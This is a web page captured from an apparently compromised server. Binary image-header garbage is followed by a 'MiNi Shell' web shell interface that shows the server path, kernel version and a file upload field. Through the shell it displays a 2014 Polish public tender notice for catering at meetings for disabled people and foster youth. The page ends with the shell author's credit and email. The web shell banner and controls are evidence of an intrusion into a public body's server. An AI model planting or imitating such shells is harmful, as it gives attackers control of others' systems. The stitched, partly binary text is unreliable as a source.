JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140423/137774-N-2014.html

<p class="kh_header"><b>Ożarów Mazowiecki: Usługa dotycząca przygotowania, dostawy i podania posiłków 
w ramach spotkań integracyjnych i spotkań podsumowujących realizację projektu systemowego pt.: Aktywność szansą na lepsze jutro</b><br>
<b>Numer ogłoszenia: 137774 - 2014; data zamieszczenia: 23.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Powiecie Warszawskim Zachodnim , ul. Poznańska 129/133, 05-850 Ożarów Mazowiecki, woj. mazowieckie, tel. 0-22 733 72 50, 733 72 52, faks 0-22 733 72 54.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa dotycząca przygotowania, dostawy i podania posiłków 
w ramach spotkań integracyjnych i spotkań podsumowujących realizację projektu systemowego pt.: Aktywność szansą na lepsze jutro.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi dotyczącej przygotowania, dostawy 
i podania posiłków w ramach 3 spotkań integracyjnych i 2 spotkań podsumowujących realizację projektu systemowego pt.: Aktywność szansą na lepsze jutro, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie, Priorytet VII Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony na podstawie oświadczenia złożonego 
w związku z art. 22 ust. 1 ustawy (Załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony na podstawie oświadczenia złożonego 
w związku z art. 22 ust. 1 ustawy (Załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony na podstawie oświadczenia złożonego 
w związku z art. 22 ust. 1 ustawy (Załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony na podstawie oświadczenia złożonego 
w związku z art. 22 ust. 1 ustawy (Załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony na podstawie oświadczenia złożonego 
w związku z art. 22 ust. 1 ustawy (Załącznik nr 4 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zastrzega się prawo dokonania w umowie zmian, które nie są istotne, prawo do zmiany okresu realizacji umowy, zmiany terminu i zasad płatności oraz możliwość wprowadzenia zmian do zawartej umowy, na podstawie art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907, 984, 1047, 1473 oraz z 2014 r. poz. 423). Przewiduje się możliwość wprowadzenia istotnych zmian umowy, gdy konieczność wprowadzenia takich zmian wynikać będzie z okoliczności, których przy dochowaniu należytej staranności nie można było przewidzieć w chwili zawierania umowy oraz gdy zmiany te są korzystne dla Zamawiającego bez zwiększania ustalonego wynagrodzenia Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pcpr.pwz.pl/glowna.php?idpm=2<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Powiecie Warszawskim Zachodnim, ul. Poznańska 129/133, 05-850 Ożarów Mazowiecki, pok. nr 136.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2014 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Powiecie Warszawskim Zachodnim, ul. Poznańska 129/133, 05-850 Ożarów Mazowiecki, pok. nr 136.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pt.: Aktywność szansą na lepsze jutro, realizowany
w ramach Poddziałania 7.1.2 Rozwój i upowszechnianie aktywnej integracji 
przez powiatowe centra pomocy rodzinie, Priorytet VII Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> przygotowanie, dostawa i podanie     posiłków na spotkaniu integracyjno-edukacyjnym dla osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem pierwszej części zamówienia jest przygotowanie, dostawa i podanie     posiłków na spotkaniu integracyjno-edukacyjnym dla osób niepełnosprawnych i ich otoczenia, w czerwcu 2014r. na terenie Domu Pomocy Społecznej w Bramkach, 
ul. Północna 18, Bramki, 05-870 Błonie, przewidywana liczba uczestników 200 osób. 
Wykonawca będzie zobowiązany do zapewnienia odpowiedniej obsługi kelnerskiej, zastawy (naczynia, sztućce, obrusy) oraz przygotowania posiłków w ilości odpowiadającej wskazanej powyżej liczbie osób.
Wykonawca będzie zobowiązany do przedstawienia propozycji menu do zaakceptowania Zamawiającemu przed każdym spotkaniem, zapewnienia osób niezbędnych do prawidłowego wykonania usługi oraz dostarczenia do miejsca wskazanego przez Zamawiającego na własny koszt rzeczy koniecznych do prawidłowego wykonania usługi. Po zakończeniu spotkania Wykonawca będzie zobowiązany do doprowadzenia miejsce świadczenia usługi do stanu sprzed rozpoczęcia jej świadczenia oraz odbioru naczyń wykorzystywanych w trakcie świadczenia usługi. 
Zamawiający będzie powiadamiał e-mailowo lub telefonicznie Wykonawcę o dokładnym terminie realizacji przedmiotowej części przedmiotu umowy najpóźniej 5 dni przed planowaną datą organizacji spotkania.
Szczegółowe wymagania dotyczące wymaganego menu zostały przedstawione w opisie przedmiotu zamówienia, stanowiącego załącznik do specyfikacji istotnych warunków zamówienia dostępnej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie, dostawa i podanie posiłków na spotkaniu integracyjno-edukacyjnym dla osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem drugiej części zamówienia jest przygotowanie, dostawa i podanie posiłków na spotkaniu integracyjno-edukacyjnym dla osób niepełnosprawnych 
i ich otoczenia, we wrześniu 2014r. na terenie Domu Pomocy Społecznej w Sadowej, ul. Jagodowa 2, 05-092 Łomianki, przewidywana liczba uczestników 200 osób.
Wykonawca będzie zobowiązany do zapewnienia odpowiedniej obsługi kelnerskiej, zastawy (naczynia, sztućce, obrusy) oraz przygotowania posiłków w ilości odpowiadającej wskazanej powyżej liczbie osób.
Wykonawca będzie zobowiązany do przedstawienia propozycji menu do zaakceptowania Zamawiającemu przed każdym spotkaniem, zapewnienia osób niezbędnych do prawidłowego wykonania usługi oraz dostarczenia do miejsca wskazanego przez Zamawiającego na własny koszt rzeczy koniecznych do prawidłowego wykonania usługi. Po zakończeniu spotkania Wykonawca będzie zobowiązany do doprowadzenia miejsce świadczenia usługi do stanu sprzed rozpoczęcia jej świadczenia oraz odbioru naczyń wykorzystywanych w trakcie świadczenia usługi. 
Zamawiający będzie powiadamiał e-mailowo lub telefonicznie Wykonawcę o dokładnym terminie realizacji przedmiotowej części przedmiotu umowy najpóźniej 5 dni przed planowaną datą organizacji spotkania.
Szczegółowe wymagania dotyczące wymaganego menu zostały przedstawione w opisie przedmiotu zamówienia, stanowiącego załącznik do specyfikacji istotnych warunków zamówienia dostępnej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie, dostawa i podanie posiłków na pikniku integracyjnym dla wychowanków rodzin zastępczych oraz osób usamodzielniających się.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem trzeciej części zamówienia jest przygotowanie, dostawa i podanie posiłków na pikniku integracyjnym dla wychowanków rodzin zastępczych oraz osób usamodzielniających się opuszczających rodziny zastępcze i placówki opiekuńczo 
- wychowawcze i ich otoczenia, sierpień/wrzesień 2014r. na terenie Domu Pomocy Społecznej w Bramkach, ul. Północna 18, Bramki, 05-870 Błonie, przewidywana liczba uczestników 160 osób.
Wykonawca będzie zobowiązany do zapewnienia odpowiedniej obsługi kelnerskiej, zastawy (naczynia, sztućce, obrusy) oraz przygotowania posiłków w ilości odpowiadającej wskazanej powyżej liczbie osób.
Wykonawca będzie zobowiązany do przedstawienia propozycji menu do zaakceptowania Zamawiającemu przed każdym spotkaniem, zapewnienia osób niezbędnych do prawidłowego wykonania usługi oraz dostarczenia do miejsca wskazanego przez Zamawiającego na własny koszt rzeczy koniecznych do prawidłowego wykonania usługi. Po zakończeniu spotkania Wykonawca będzie zobowiązany do doprowadzenia miejsce świadczenia usługi do stanu sprzed rozpoczęcia jej świadczenia oraz odbioru naczyń wykorzystywanych w trakcie świadczenia usługi. 
Zamawiający będzie powiadamiał e-mailowo lub telefonicznie Wykonawcę o dokładnym terminie realizacji przedmiotowej części przedmiotu umowy najpóźniej 5 dni przed planowaną datą organizacji spotkania.
Szczegółowe wymagania dotyczące wymaganego menu zostały przedstawione w opisie przedmiotu zamówienia, stanowiącego załącznik do specyfikacji istotnych warunków zamówienia dostępnej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przygotowanie, dostawa i podanie posiłków na spotkaniu podsumowującym projekt dla wychowanków rodzin zastępczych oraz osób usamodzielniających się.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem czwartej części zamówienia jest przygotowanie, dostawa i podanie posiłków na spotkaniu podsumowującym projekt dla wychowanków rodzin zastępczych oraz osób usamodzielniających się opuszczających rodziny zastępcze 
i placówki opiekuńczo - wychowawcze i ich otoczenia, listopad/grudzień 2014r., przewidywana liczba uczestników 80 osób. Miejsce realizacji usługi zostanie zaproponowane przez Wykonawcę. Spotkanie podsumowujące projekt musi się odbyć na terenie Powiatu Warszawskiego Zachodniego, w odległości nie większej niż 20 km od Ożarowa Mazowieckiego. Obiekt musi być dostosowany do potrzeb osób niepełnosprawnych, w tym poruszających się na wózkach inwalidzkich, z dostępem do toalet, z możliwością przeprowadzenia prezentacji multimedialnej (podłączenie laptopa, rzutnika).
Wykonawca będzie zobowiązany do zapewnienia odpowiedniej obsługi kelnerskiej, zastawy (naczynia, sztućce, obrusy) oraz przygotowania posiłków w ilości odpowiadającej wskazanej powyżej liczbie osób.
Wykonawca będzie zobowiązany do przedstawienia propozycji menu do zaakceptowania Zamawiającemu przed każdym spotkaniem, zapewnienia osób niezbędnych do prawidłowego wykonania usługi oraz dostarczenia do miejsca wskazanego przez Zamawiającego na własny koszt rzeczy koniecznych do prawidłowego wykonania usługi. Po zakończeniu spotkania Wykonawca będzie zobowiązany do doprowadzenia miejsce świadczenia usługi do stanu sprzed rozpoczęcia jej świadczenia oraz odbioru naczyń wykorzystywanych w trakcie świadczenia usługi. 
Zamawiający będzie powiadamiał e-mailowo lub telefonicznie Wykonawcę o dokładnym terminie realizacji przedmiotowej części przedmiotu umowy najpóźniej 5 dni przed planowaną datą organizacji spotkania.
Szczegółowe wymagania dotyczące wymaganego menu zostały przedstawione w opisie przedmiotu zamówienia, stanowiącego załącznik do specyfikacji istotnych warunków zamówienia dostępnej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> przygotowanie, dostawa i podanie posiłków na spotkaniu podsumowującym projekt dla osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem piątej części zamówienia jest przygotowanie, dostawa i podanie posiłków na spotkaniu podsumowującym projekt dla osób niepełnosprawnych 
i ich otoczenia, listopad/grudzień 2014r., przewidywana liczba uczestników 200 osób. Miejsce realizacji usługi zostanie zaproponowane przez Wykonawcę. Spotkanie podsumowujące projekt musi się odbyć na terenie Powiatu Warszawskiego Zachodniego, w odległości nie większej niż 20 km od Ożarowa Mazowieckiego. Obiekt musi być dostosowany do potrzeb osób niepełnosprawnych, w tym poruszających się na wózkach inwalidzkich, z dostępem do toalet, z możliwością przeprowadzenia prezentacji multimedialnej (podłączenie laptopa, rzutnika).
Wykonawca będzie zobowiązany do zapewnienia odpowiedniej obsługi kelnerskiej, zastawy (naczynia, sztućce, obrusy) oraz przygotowania posiłków w ilości odpowiadającej wskazanej powyżej liczbie osób.
Wykonawca będzie zobowiązany do przedstawienia propozycji menu do zaakceptowania Zamawiającemu przed każdym spotkaniem, zapewnienia osób niezbędnych do prawidłowego wykonania usługi oraz dostarczenia do miejsca wskazanego przez Zamawiającego na własny koszt rzeczy koniecznych do prawidłowego wykonania usługi. Po zakończeniu spotkania Wykonawca będzie zobowiązany do doprowadzenia miejsce świadczenia usługi do stanu sprzed rozpoczęcia jej świadczenia oraz odbioru naczyń wykorzystywanych w trakcie świadczenia usługi. 
Zamawiający będzie powiadamiał e-mailowo lub telefonicznie Wykonawcę o dokładnym terminie realizacji przedmiotowej części przedmiotu umowy najpóźniej 5 dni przed planowaną datą organizacji spotkania.
Szczegółowe wymagania dotyczące wymaganego menu zostały przedstawione w opisie przedmiotu zamówienia, stanowiącego załącznik do specyfikacji istotnych warunków zamówienia dostępnej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com